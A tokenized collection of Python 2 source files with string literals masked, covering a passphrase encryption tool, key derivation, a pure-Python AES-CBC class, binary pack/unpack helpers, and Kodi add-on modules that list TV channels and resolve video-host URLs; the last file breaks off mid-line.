<s> """<STR_LIT>""" <EOL> import sys , getpass , getopt , os <EOL> from crypto . cipher . trolldoll import Trolldoll <EOL> from crypto . errors import DecryptNotBlockAlignedError <EOL> from binascii_plus import * <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> path , progName = os . path . split ( sys . argv [ <NUM_LIT:0> ] ) <EOL> usage = """<STR_LIT>""" % progName <EOL> try : <EOL> optlist , args = getopt . getopt ( sys . argv [ <NUM_LIT:1> : ] , '<STR_LIT>' ) <EOL> except getopt . GetoptError , err : <EOL> sys . exit ( "<STR_LIT>" % ( err , usage ) ) <EOL> print optlist , '<STR_LIT>' , args <EOL> optdict = { } <EOL> for option in optlist : <EOL> if not optdict . has_key ( option [ <NUM_LIT:0> ] ) : <EOL> optdict [ option [ <NUM_LIT:0> ] ] = option [ <NUM_LIT:1> ] <EOL> else : <EOL> sys . exit ( "<STR_LIT>" % ( option [ <NUM_LIT:0> ] , usage ) ) <EOL> if optdict . has_key ( '<STR_LIT>' ) and optdict . has_key ( '<STR_LIT>' ) : <EOL> sys . exit ( "<STR_LIT>" % usage ) <EOL> if not ( optdict . has_key ( '<STR_LIT>' ) or optdict . has_key ( '<STR_LIT>' ) ) : <EOL> sys . exit ( "<STR_LIT>" % usage ) <EOL> if optdict . has_key ( '<STR_LIT>' ) : <EOL> passPhrase = optdict [ '<STR_LIT>' ] <EOL> else : <EOL> passPhrase = getpass . getpass ( '<STR_LIT>' ) <EOL> if optdict . has_key ( '<STR_LIT>' ) : <EOL> infile = open ( optdict [ '<STR_LIT>' ] , '<STR_LIT:rb>' ) <EOL> input = infile . read ( ) <EOL> else : <EOL> input = sys . stdin . read ( ) <EOL> print "<STR_LIT>" % ( len ( input ) , b2a_pt ( input ) ) <EOL> alg = Trolldoll ( ivSize = <NUM_LIT> ) <EOL> alg . setPassphrase ( passPhrase ) <EOL> if optdict . has_key ( '<STR_LIT>' ) : <EOL> output = alg . encrypt ( input ) <EOL> elif optdict . has_key ( '<STR_LIT>' ) : <EOL> try : <EOL> output = alg . decrypt ( input ) <EOL> except DecryptNotBlockAlignedError , errMessage : <EOL> sys . exit ( """<STR_LIT>""" % errMessage ) <EOL> else : <EOL> sys . 
exit ( "<STR_LIT>" % usage ) <EOL> print "<STR_LIT>" % ( len ( output ) , b2a_pt ( output ) ) <EOL> if optdict . has_key ( '<STR_LIT>' ) : <EOL> outfile = open ( optdict [ '<STR_LIT>' ] , '<STR_LIT:wb>' ) <EOL> outfile . write ( output ) <EOL> else : <EOL> sys . stdout . write ( output ) <EOL> sys . exit ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> """<STR_LIT>""" <EOL> main ( ) </s>
<s> def EVP_BytesToKey ( md , data , salt , keyLength , ivLength , count ) : <EOL> assert ( data ) <EOL> assert ( keyLength > <NUM_LIT:0> ) <EOL> assert ( ivLength >= <NUM_LIT:0> ) <EOL> if salt : <EOL> assert ( len ( salt ) == <NUM_LIT:8> ) <EOL> assert ( count >= <NUM_LIT:1> ) <EOL> key = iv = hashed = '<STR_LIT>' <EOL> while <NUM_LIT:1> : <EOL> m = md ( ) <EOL> if hashed : <EOL> m . update ( hashed ) <EOL> m . update ( data ) <EOL> if salt : <EOL> m . update ( salt ) <EOL> hashed = m . digest ( ) <EOL> for i in xrange ( count - <NUM_LIT:1> ) : <EOL> m = md ( ) <EOL> m . update ( hashed ) <EOL> hashed = m . digest ( ) <EOL> keyNeeds = keyLength - len ( key ) <EOL> tmp = hashed <EOL> if keyNeeds > <NUM_LIT:0> : <EOL> key += tmp [ : keyNeeds ] <EOL> tmp = tmp [ keyNeeds : ] <EOL> ivNeeds = ivLength - len ( iv ) <EOL> if tmp and ( ivNeeds > <NUM_LIT:0> ) : <EOL> iv += tmp [ : ivNeeds ] <EOL> if keyNeeds == ivNeeds == <NUM_LIT:0> : <EOL> break <EOL> return key , iv </s>
<s> '''<STR_LIT>''' <EOL> import sys , re , json , urllib , urlparse , datetime <EOL> from resources . lib . libraries import control <EOL> from resources . lib . libraries import client <EOL> from resources . lib . libraries import workers <EOL> class channels : <EOL> def __init__ ( self ) : <EOL> self . list = [ ] ; self . items = [ ] <EOL> self . uk_datetime = self . uk_datetime ( ) <EOL> self . systime = ( self . uk_datetime ) . strftime ( '<STR_LIT>' ) <EOL> self . imdb_by_query = '<STR_LIT>' <EOL> self . sky_now_link = '<STR_LIT>' <EOL> self . sky_programme_link = '<STR_LIT>' <EOL> def get ( self ) : <EOL> channels = [ ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> threads = [ ] <EOL> for i in channels : threads . append ( workers . Thread ( self . sky_list , i [ <NUM_LIT:0> ] , i [ <NUM_LIT:1> ] , i [ <NUM_LIT:2> ] ) ) <EOL> [ i . start ( ) for i in threads ] <EOL> [ i . join ( ) for i in threads ] <EOL> threads = [ ] <EOL> for i in range ( <NUM_LIT:0> , len ( self . items ) ) : threads . append ( workers . Thread ( self . items_list , self . items [ i ] ) ) <EOL> [ i . start ( ) for i in threads ] <EOL> [ i . join ( ) for i in threads ] <EOL> try : self . list = sorted ( self . list , key = lambda k : k [ '<STR_LIT>' ] ) <EOL> except : pass <EOL> self . channelDirectory ( self . list ) <EOL> return self . 
list <EOL> def sky_list ( self , num , channel , id ) : <EOL> try : <EOL> url = self . sky_now_link % id <EOL> result = client . request ( url , timeout = '<STR_LIT>' ) <EOL> result = json . loads ( result ) <EOL> match = result [ '<STR_LIT>' ] [ id ] [ <NUM_LIT:0> ] [ '<STR_LIT:url>' ] <EOL> dt1 = ( self . uk_datetime ) . strftime ( '<STR_LIT>' ) <EOL> dt2 = int ( ( self . uk_datetime ) . strftime ( '<STR_LIT>' ) ) <EOL> if ( dt2 < <NUM_LIT:6> ) : dt2 = <NUM_LIT:0> <EOL> elif ( dt2 >= <NUM_LIT:6> and dt2 < <NUM_LIT:12> ) : dt2 = <NUM_LIT:1> <EOL> elif ( dt2 >= <NUM_LIT:12> and dt2 < <NUM_LIT> ) : dt2 = <NUM_LIT:2> <EOL> elif ( dt2 >= <NUM_LIT> ) : dt2 = <NUM_LIT:3> <EOL> url = self . sky_programme_link % ( id , str ( dt1 ) , str ( dt2 ) ) <EOL> result = client . request ( url , timeout = '<STR_LIT>' ) <EOL> result = json . loads ( result ) <EOL> result = result [ '<STR_LIT>' ] [ id ] <EOL> result = [ i for i in result if i [ '<STR_LIT:url>' ] == match ] [ <NUM_LIT:0> ] <EOL> year = result [ '<STR_LIT:d>' ] <EOL> year = re . findall ( '<STR_LIT>' , year ) [ <NUM_LIT:0> ] . strip ( ) <EOL> year = year . encode ( '<STR_LIT:utf-8>' ) <EOL> title = result [ '<STR_LIT:t>' ] <EOL> title = title . replace ( '<STR_LIT>' % year , '<STR_LIT>' ) . strip ( ) <EOL> title = client . replaceHTMLCodes ( title ) <EOL> title = title . encode ( '<STR_LIT:utf-8>' ) <EOL> self . items . append ( ( title , year , channel , num ) ) <EOL> except : <EOL> pass <EOL> def items_list ( self , i ) : <EOL> try : <EOL> url = self . imdb_by_query % ( urllib . quote_plus ( i [ <NUM_LIT:0> ] ) , i [ <NUM_LIT:1> ] ) <EOL> item = client . request ( url , timeout = '<STR_LIT>' ) <EOL> item = json . loads ( item ) <EOL> title = item [ '<STR_LIT>' ] <EOL> title = client . replaceHTMLCodes ( title ) <EOL> title = title . encode ( '<STR_LIT:utf-8>' ) <EOL> year = item [ '<STR_LIT>' ] <EOL> year = re . sub ( '<STR_LIT>' , '<STR_LIT>' , str ( year ) ) <EOL> year = year . 
encode ( '<STR_LIT:utf-8>' ) <EOL> name = '<STR_LIT>' % ( title , year ) <EOL> try : name = name . encode ( '<STR_LIT:utf-8>' ) <EOL> except : pass <EOL> imdb = item [ '<STR_LIT>' ] <EOL> if imdb == None or imdb == '<STR_LIT>' or imdb == '<STR_LIT>' : raise Exception ( ) <EOL> imdb = '<STR_LIT>' + re . sub ( '<STR_LIT>' , '<STR_LIT>' , str ( imdb ) ) <EOL> imdb = imdb . encode ( '<STR_LIT:utf-8>' ) <EOL> poster = item [ '<STR_LIT>' ] <EOL> if poster == None or poster == '<STR_LIT>' or poster == '<STR_LIT>' : poster = '<STR_LIT:0>' <EOL> if not ( '<STR_LIT>' in poster or '<STR_LIT>' in poster ) : poster = '<STR_LIT:0>' <EOL> poster = re . sub ( '<STR_LIT>' , '<STR_LIT>' , poster ) <EOL> poster = poster . encode ( '<STR_LIT:utf-8>' ) <EOL> genre = item [ '<STR_LIT>' ] <EOL> if genre == None or genre == '<STR_LIT>' or genre == '<STR_LIT>' : genre = '<STR_LIT:0>' <EOL> genre = genre . replace ( '<STR_LIT:U+002CU+0020>' , '<STR_LIT>' ) <EOL> genre = genre . encode ( '<STR_LIT:utf-8>' ) <EOL> duration = item [ '<STR_LIT>' ] <EOL> if duration == None or duration == '<STR_LIT>' or duration == '<STR_LIT>' : duration = '<STR_LIT:0>' <EOL> duration = re . sub ( '<STR_LIT>' , '<STR_LIT>' , str ( duration ) ) <EOL> duration = duration . encode ( '<STR_LIT:utf-8>' ) <EOL> rating = item [ '<STR_LIT>' ] <EOL> if rating == None or rating == '<STR_LIT>' or rating == '<STR_LIT>' or rating == '<STR_LIT>' : rating = '<STR_LIT:0>' <EOL> rating = rating . encode ( '<STR_LIT:utf-8>' ) <EOL> votes = item [ '<STR_LIT>' ] <EOL> try : votes = str ( format ( int ( votes ) , '<STR_LIT>' ) ) <EOL> except : pass <EOL> if votes == None or votes == '<STR_LIT>' or votes == '<STR_LIT>' : votes = '<STR_LIT:0>' <EOL> votes = votes . encode ( '<STR_LIT:utf-8>' ) <EOL> mpaa = item [ '<STR_LIT>' ] <EOL> if mpaa == None or mpaa == '<STR_LIT>' or mpaa == '<STR_LIT>' : mpaa = '<STR_LIT:0>' <EOL> mpaa = mpaa . 
encode ( '<STR_LIT:utf-8>' ) <EOL> director = item [ '<STR_LIT>' ] <EOL> if director == None or director == '<STR_LIT>' or director == '<STR_LIT>' : director = '<STR_LIT:0>' <EOL> director = director . replace ( '<STR_LIT:U+002CU+0020>' , '<STR_LIT>' ) <EOL> director = re . sub ( r'<STR_LIT>' , '<STR_LIT>' , director ) <EOL> director = '<STR_LIT:U+0020>' . join ( director . split ( ) ) <EOL> director = director . encode ( '<STR_LIT:utf-8>' ) <EOL> writer = item [ '<STR_LIT>' ] <EOL> if writer == None or writer == '<STR_LIT>' or writer == '<STR_LIT>' : writer = '<STR_LIT:0>' <EOL> writer = writer . replace ( '<STR_LIT:U+002CU+0020>' , '<STR_LIT>' ) <EOL> writer = re . sub ( r'<STR_LIT>' , '<STR_LIT>' , writer ) <EOL> writer = '<STR_LIT:U+0020>' . join ( writer . split ( ) ) <EOL> writer = writer . encode ( '<STR_LIT:utf-8>' ) <EOL> cast = item [ '<STR_LIT>' ] <EOL> if cast == None or cast == '<STR_LIT>' or cast == '<STR_LIT>' : cast = '<STR_LIT:0>' <EOL> cast = [ x . strip ( ) for x in cast . split ( '<STR_LIT:U+002C>' ) if not x == '<STR_LIT>' ] <EOL> try : cast = [ ( x . encode ( '<STR_LIT:utf-8>' ) , '<STR_LIT>' ) for x in cast ] <EOL> except : cast = [ ] <EOL> if cast == [ ] : cast = '<STR_LIT:0>' <EOL> plot = item [ '<STR_LIT>' ] <EOL> if plot == None or plot == '<STR_LIT>' or plot == '<STR_LIT>' : plot = '<STR_LIT:0>' <EOL> plot = client . replaceHTMLCodes ( plot ) <EOL> plot = plot . encode ( '<STR_LIT:utf-8>' ) <EOL> tagline = re . compile ( '<STR_LIT>' ) . split ( plot ) [ <NUM_LIT:0> ] <EOL> try : tagline = tagline . encode ( '<STR_LIT:utf-8>' ) <EOL> except : pass <EOL> self . list . 
append ( { '<STR_LIT:title>' : title , '<STR_LIT>' : title , '<STR_LIT>' : year , '<STR_LIT>' : genre , '<STR_LIT>' : duration , '<STR_LIT>' : rating , '<STR_LIT>' : votes , '<STR_LIT>' : mpaa , '<STR_LIT>' : director , '<STR_LIT>' : writer , '<STR_LIT>' : cast , '<STR_LIT>' : plot , '<STR_LIT>' : tagline , '<STR_LIT:name>' : name , '<STR_LIT:code>' : imdb , '<STR_LIT>' : imdb , '<STR_LIT>' : poster , '<STR_LIT>' : i [ <NUM_LIT:2> ] , '<STR_LIT>' : i [ <NUM_LIT:3> ] } ) <EOL> except : <EOL> pass <EOL> def uk_datetime ( self ) : <EOL> dt = datetime . datetime . utcnow ( ) + datetime . timedelta ( hours = <NUM_LIT:0> ) <EOL> d = datetime . datetime ( dt . year , <NUM_LIT:4> , <NUM_LIT:1> ) <EOL> dston = d - datetime . timedelta ( days = d . weekday ( ) + <NUM_LIT:1> ) <EOL> d = datetime . datetime ( dt . year , <NUM_LIT:11> , <NUM_LIT:1> ) <EOL> dstoff = d - datetime . timedelta ( days = d . weekday ( ) + <NUM_LIT:1> ) <EOL> if dston <= dt < dstoff : <EOL> return dt + datetime . timedelta ( hours = <NUM_LIT:1> ) <EOL> else : <EOL> return dt <EOL> def channelDirectory ( self , items ) : <EOL> if items == None or len ( items ) == <NUM_LIT:0> : return <EOL> playbackMenu = control . lang ( <NUM_LIT> ) . encode ( '<STR_LIT:utf-8>' ) if control . setting ( '<STR_LIT>' ) == '<STR_LIT:true>' else control . lang ( <NUM_LIT> ) . encode ( '<STR_LIT:utf-8>' ) <EOL> addonPoster , addonBanner = control . addonPoster ( ) , control . addonBanner ( ) <EOL> addonFanart = control . addonFanart ( ) <EOL> sysaddon = sys . argv [ <NUM_LIT:0> ] <EOL> for i in items : <EOL> try : <EOL> label = "<STR_LIT>" % ( i [ '<STR_LIT>' ] . upper ( ) , i [ '<STR_LIT:name>' ] ) <EOL> sysname = urllib . quote_plus ( i [ '<STR_LIT:name>' ] ) <EOL> systitle = urllib . 
quote_plus ( i [ '<STR_LIT:title>' ] ) <EOL> imdb , tmdb , year = i [ '<STR_LIT>' ] , '<STR_LIT:0>' , i [ '<STR_LIT>' ] <EOL> poster , banner = i [ '<STR_LIT>' ] , i [ '<STR_LIT>' ] <EOL> if poster == '<STR_LIT:0>' : poster = addonPoster <EOL> if banner == '<STR_LIT:0>' and poster == '<STR_LIT:0>' : banner = addonBanner <EOL> elif banner == '<STR_LIT:0>' : banner = poster <EOL> meta = dict ( ( k , v ) for k , v in i . iteritems ( ) if not v == '<STR_LIT:0>' ) <EOL> meta . update ( { '<STR_LIT>' : '<STR_LIT>' % ( sysaddon , sysname ) } ) <EOL> if i [ '<STR_LIT>' ] == '<STR_LIT:0>' : meta . update ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> try : meta . update ( { '<STR_LIT>' : str ( int ( meta [ '<STR_LIT>' ] ) * <NUM_LIT> ) } ) <EOL> except : pass <EOL> sysmeta = urllib . quote_plus ( json . dumps ( meta ) ) <EOL> url = '<STR_LIT>' % ( sysaddon , sysname , systitle , year , imdb , tmdb , sysmeta , self . systime ) <EOL> sysurl = urllib . quote_plus ( url ) <EOL> cm = [ ] <EOL> cm . append ( ( playbackMenu , '<STR_LIT>' % ( sysaddon , sysurl , sysmeta ) ) ) <EOL> cm . append ( ( control . lang ( <NUM_LIT> ) . encode ( '<STR_LIT:utf-8>' ) , '<STR_LIT>' ) ) <EOL> cm . append ( ( control . lang ( <NUM_LIT> ) . encode ( '<STR_LIT:utf-8>' ) , '<STR_LIT>' % ( sysaddon ) ) ) <EOL> cm . append ( ( control . lang ( <NUM_LIT> ) . encode ( '<STR_LIT:utf-8>' ) , '<STR_LIT>' % ( sysaddon ) ) ) <EOL> cm . append ( ( control . lang ( <NUM_LIT> ) . encode ( '<STR_LIT:utf-8>' ) , '<STR_LIT>' % ( sysaddon ) ) ) <EOL> item = control . item ( label = label , iconImage = poster , thumbnailImage = poster ) <EOL> try : item . setArt ( { '<STR_LIT>' : poster , '<STR_LIT>' : banner } ) <EOL> except : pass <EOL> if not addonFanart == None : <EOL> item . setProperty ( '<STR_LIT>' , addonFanart ) <EOL> item . setInfo ( type = '<STR_LIT>' , infoLabels = meta ) <EOL> item . setProperty ( '<STR_LIT>' , '<STR_LIT:true>' ) <EOL> item . addContextMenuItems ( cm , replaceItems = True ) <EOL> control . 
addItem ( handle = int ( sys . argv [ <NUM_LIT:1> ] ) , url = url , listitem = item , isFolder = False ) <EOL> except : <EOL> pass <EOL> control . content ( int ( sys . argv [ <NUM_LIT:1> ] ) , '<STR_LIT>' ) <EOL> control . directory ( int ( sys . argv [ <NUM_LIT:1> ] ) , cacheToDisc = True ) </s>
<s> import struct <EOL> """<STR_LIT>""" <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class EndOfFile ( Exception ) : <EOL> pass <EOL> def get_ui32 ( f ) : <EOL> try : <EOL> ret = struct . unpack ( "<STR_LIT>" , f . read ( <NUM_LIT:4> ) ) [ <NUM_LIT:0> ] <EOL> except struct . error : <EOL> raise EndOfFile <EOL> return ret <EOL> def make_ui32 ( num ) : <EOL> return struct . pack ( "<STR_LIT>" , num ) <EOL> def get_si32_extended ( f ) : <EOL> low_high = f . read ( <NUM_LIT:4> ) <EOL> if len ( low_high ) < <NUM_LIT:4> : <EOL> raise EndOfFile <EOL> combined = low_high [ <NUM_LIT:3> ] + low_high [ : <NUM_LIT:3> ] <EOL> return struct . unpack ( "<STR_LIT>" , combined ) [ <NUM_LIT:0> ] <EOL> def make_si32_extended ( num ) : <EOL> ret = struct . pack ( "<STR_LIT>" , num ) <EOL> return ret [ <NUM_LIT:1> : ] + ret [ <NUM_LIT:0> ] <EOL> def get_ui24 ( f ) : <EOL> try : <EOL> high , low = struct . unpack ( "<STR_LIT>" , f . read ( <NUM_LIT:3> ) ) <EOL> except struct . error : <EOL> raise EndOfFile <EOL> ret = ( high << <NUM_LIT:16> ) + low <EOL> return ret <EOL> def make_ui24 ( num ) : <EOL> ret = struct . pack ( "<STR_LIT>" , num ) <EOL> return ret [ <NUM_LIT:1> : ] <EOL> def get_ui16 ( f ) : <EOL> try : <EOL> ret = struct . unpack ( "<STR_LIT>" , f . read ( <NUM_LIT:2> ) ) [ <NUM_LIT:0> ] <EOL> except struct . error : <EOL> raise EndOfFile <EOL> return ret <EOL> def make_ui16 ( num ) : <EOL> return struct . pack ( "<STR_LIT>" , num ) <EOL> def get_si16 ( f ) : <EOL> try : <EOL> ret = struct . unpack ( "<STR_LIT>" , f . read ( <NUM_LIT:2> ) ) [ <NUM_LIT:0> ] <EOL> except struct . error : <EOL> raise EndOfFile <EOL> return ret <EOL> def make_si16 ( num ) : <EOL> return struct . pack ( "<STR_LIT>" , num ) <EOL> def get_ui8 ( f ) : <EOL> try : <EOL> ret = struct . 
unpack ( "<STR_LIT:B>" , f . read ( <NUM_LIT:1> ) ) [ <NUM_LIT:0> ] <EOL> except struct . error : <EOL> raise EndOfFile <EOL> return ret <EOL> def make_ui8 ( num ) : <EOL> return struct . pack ( "<STR_LIT:B>" , num ) <EOL> def get_double ( f ) : <EOL> data = f . read ( <NUM_LIT:8> ) <EOL> try : <EOL> ret = struct . unpack ( "<STR_LIT>" , data ) [ <NUM_LIT:0> ] <EOL> except struct . error : <EOL> raise EndOfFile <EOL> return ret <EOL> def make_double ( num ) : <EOL> return struct . pack ( "<STR_LIT>" , num ) </s>
<s> """<STR_LIT>""" <EOL> from . cryptomath import * <EOL> from . aes import * <EOL> from . rijndael import rijndael <EOL> def new ( key , mode , IV ) : <EOL> return Python_AES ( key , mode , IV ) <EOL> class Python_AES ( AES ) : <EOL> def __init__ ( self , key , mode , IV ) : <EOL> AES . __init__ ( self , key , mode , IV , "<STR_LIT>" ) <EOL> self . rijndael = rijndael ( key , <NUM_LIT:16> ) <EOL> self . IV = IV <EOL> def encrypt ( self , plaintext ) : <EOL> AES . encrypt ( self , plaintext ) <EOL> plaintextBytes = plaintext [ : ] <EOL> chainBytes = self . IV [ : ] <EOL> for x in range ( len ( plaintextBytes ) // <NUM_LIT:16> ) : <EOL> blockBytes = plaintextBytes [ x * <NUM_LIT:16> : ( x * <NUM_LIT:16> ) + <NUM_LIT:16> ] <EOL> for y in range ( <NUM_LIT:16> ) : <EOL> blockBytes [ y ] ^= chainBytes [ y ] <EOL> encryptedBytes = self . rijndael . encrypt ( blockBytes ) <EOL> for y in range ( <NUM_LIT:16> ) : <EOL> plaintextBytes [ ( x * <NUM_LIT:16> ) + y ] = encryptedBytes [ y ] <EOL> chainBytes = encryptedBytes <EOL> self . IV = chainBytes [ : ] <EOL> return plaintextBytes <EOL> def decrypt ( self , ciphertext ) : <EOL> AES . decrypt ( self , ciphertext ) <EOL> ciphertextBytes = ciphertext [ : ] <EOL> chainBytes = self . IV [ : ] <EOL> for x in range ( len ( ciphertextBytes ) // <NUM_LIT:16> ) : <EOL> blockBytes = ciphertextBytes [ x * <NUM_LIT:16> : ( x * <NUM_LIT:16> ) + <NUM_LIT:16> ] <EOL> decryptedBytes = self . rijndael . decrypt ( blockBytes ) <EOL> for y in range ( <NUM_LIT:16> ) : <EOL> decryptedBytes [ y ] ^= chainBytes [ y ] <EOL> ciphertextBytes [ ( x * <NUM_LIT:16> ) + y ] = decryptedBytes [ y ] <EOL> chainBytes = blockBytes <EOL> self . IV = chainBytes [ : ] <EOL> return ciphertextBytes </s>
<s> '''<STR_LIT>''' <EOL> import threading <EOL> class Thread ( threading . Thread ) : <EOL> def __init__ ( self , target , * args ) : <EOL> self . _target = target <EOL> self . _args = args <EOL> threading . Thread . __init__ ( self ) <EOL> def run ( self ) : <EOL> self . _target ( * self . _args ) </s>
<s> '''<STR_LIT>''' <EOL> import re <EOL> from resources . lib . libraries import client <EOL> from resources . lib . libraries import jsunpack <EOL> def resolve ( url ) : <EOL> try : <EOL> url = url . replace ( '<STR_LIT>' , '<STR_LIT:/>' ) <EOL> url = re . compile ( '<STR_LIT>' ) . findall ( url ) [ <NUM_LIT:0> ] <EOL> url = '<STR_LIT>' % url <EOL> result = client . request ( url , mobile = True ) <EOL> result = re . compile ( '<STR_LIT>' ) . findall ( result ) [ - <NUM_LIT:1> ] <EOL> result = jsunpack . unpack ( result ) <EOL> url = client . parseDOM ( result , '<STR_LIT>' , ret = '<STR_LIT:src>' ) <EOL> url += re . compile ( "<STR_LIT>" ) . findall ( result ) <EOL> url = [ i for i in url if not i . endswith ( '<STR_LIT>' ) ] <EOL> url = '<STR_LIT>' + url [ <NUM_LIT:0> ] . split ( '<STR_LIT>' , <NUM_LIT:1> ) [ - <NUM_LIT:1> ] <EOL> return url <EOL> except : <EOL> return </s>
<s> '''<STR_LIT>''' <EOL> import re , urllib <EOL> from resources . lib . libraries import client <EOL> def resolve ( url ) : <EOL> try : <EOL> url = re . compile ( '<STR_LIT>' ) . findall ( url ) [ <NUM_LIT:0> ] <EOL> url = '<STR_LIT>' % url <EOL> result = client . request ( url ) <EOL> post = { } <EOL> f = client . parseDOM ( result , '<STR_LIT>' , attrs = { '<STR_LIT:class>' : '<STR_LIT>' } ) [ <NUM_LIT:0> ] <EOL> k = client . parseDOM ( f , '<STR_LIT:input>' , ret = '<STR_LIT:name>' , attrs = { '<STR_LIT:type>' : '<STR_LIT>' } ) <EOL> for i in k : post . update ( { i : client . parseDOM ( f , '<STR_LIT:input>' , ret = '<STR_LIT:value>' , attrs = { '<STR_LIT:name>' : i } ) [ <NUM_LIT:0> ] } ) <EOL> post = post . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> result = client . request ( url , post = post ) <EOL> url = re . compile ( '<STR_LIT>' ) . findall ( result ) [ - <NUM_LIT:1> ] <EOL> return url <EOL> except : <EOL> return </s>
<s> '''<STR_LIT>''' <EOL> import re , urllib <EOL> from resources . lib . libraries import client <EOL> def resolve ( url ) : <EOL> try : <EOL> id = url . split ( "<STR_LIT>" ) [ - <NUM_LIT:1> ] . split ( "<STR_LIT:/>" ) [ - <NUM_LIT:1> ] . split ( "<STR_LIT:?>" ) [ <NUM_LIT:0> ] . split ( "<STR_LIT:&>" ) [ <NUM_LIT:0> ] <EOL> result = client . request ( '<STR_LIT>' % id ) <EOL> message = client . parseDOM ( result , '<STR_LIT>' , attrs = { '<STR_LIT:id>' : '<STR_LIT>' } ) <EOL> message = '<STR_LIT>' . join ( message ) <EOL> alert = client . parseDOM ( result , '<STR_LIT>' , attrs = { '<STR_LIT:id>' : '<STR_LIT>' } ) <EOL> if re . search ( '<STR_LIT>' , result ) : <EOL> url = live ( result , id ) <EOL> if not url == None : return url <EOL> if len ( alert ) > <NUM_LIT:0> : raise Exception ( ) <EOL> if re . search ( '<STR_LIT>' , message ) : raise Exception ( ) <EOL> url = '<STR_LIT>' % id <EOL> return url <EOL> except : <EOL> return <EOL> def live ( result , id ) : <EOL> try : <EOL> hls = re . compile ( '<STR_LIT>' ) . findall ( result ) <EOL> if len ( hls ) == <NUM_LIT:0> : <EOL> url = '<STR_LIT>' % id <EOL> url = '<STR_LIT>' % url <EOL> hls = client . request ( url ) <EOL> hls = re . compile ( '<STR_LIT>' ) . findall ( hls ) <EOL> url = urllib . unquote ( hls [ <NUM_LIT:0> ] ) . replace ( '<STR_LIT>' , '<STR_LIT:/>' ) <EOL> result = client . request ( url ) <EOL> result = result . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) <EOL> url = re . compile ( '<STR_LIT>' ) . findall ( result ) <EOL> url = [ ( int ( i [ <NUM_LIT:0> ] ) , i [ <NUM_LIT:1> ] ) for i in url ] <EOL> url . sort ( ) <EOL> url = url [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] <EOL> return url <EOL> except : <EOL> return </s>
<s> '''<STR_LIT>''' <EOL> import re , urlparse , json <EOL> from resources . lib . libraries import client <EOL> from resources . lib import resolvers <EOL> class source : <EOL> def __init__ ( self ) : <EOL> self . base_link = '<STR_LIT>' <EOL> self . search_link = '<STR_LIT>' <EOL> def get_movie ( self , imdb , title , year ) : <EOL> try : <EOL> query = self . search_link % imdb <EOL> query = urlparse . urljoin ( self . base_link , query ) <EOL> result = client . source ( query ) <EOL> result = json . loads ( result ) <EOL> result = result [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> url = '<STR_LIT>' % result <EOL> url = client . replaceHTMLCodes ( url ) <EOL> url = url . encode ( '<STR_LIT:utf-8>' ) <EOL> return url <EOL> except : <EOL> return <EOL> def get_show ( self , imdb , tvdb , tvshowtitle , year ) : <EOL> try : <EOL> url = '<STR_LIT>' % ( tvshowtitle , year ) <EOL> url = client . replaceHTMLCodes ( url ) <EOL> url = url . encode ( '<STR_LIT:utf-8>' ) <EOL> return url <EOL> except : <EOL> return <EOL> def get_episode ( self , url , imdb , tvdb , title , date , season , episode ) : <EOL> try : <EOL> query = self . search_link % imdb <EOL> query = urlparse . urljoin ( self . base_link , query ) <EOL> result = client . source ( query ) <EOL> result = json . loads ( result ) <EOL> result = result [ '<STR_LIT>' ] <EOL> season = '<STR_LIT>' % int ( season ) <EOL> episode = '<STR_LIT>' % int ( episode ) <EOL> result = [ ( i [ '<STR_LIT>' ] , i [ '<STR_LIT>' ] ) for i in result ] <EOL> result = [ ( i [ <NUM_LIT:0> ] , re . compile ( '<STR_LIT>' ) . findall ( i [ <NUM_LIT:1> ] ) ) for i in result ] <EOL> result = [ ( i [ <NUM_LIT:0> ] , i [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) for i in result if len ( i [ <NUM_LIT:1> ] ) > <NUM_LIT:0> ] <EOL> result = [ i [ <NUM_LIT:0> ] for i in result if season == i [ <NUM_LIT:1> ] ] [ <NUM_LIT:0> ] <EOL> url = '<STR_LIT>' % ( result , season , episode ) <EOL> url = client . replaceHTMLCodes ( url ) <EOL> url = url . 
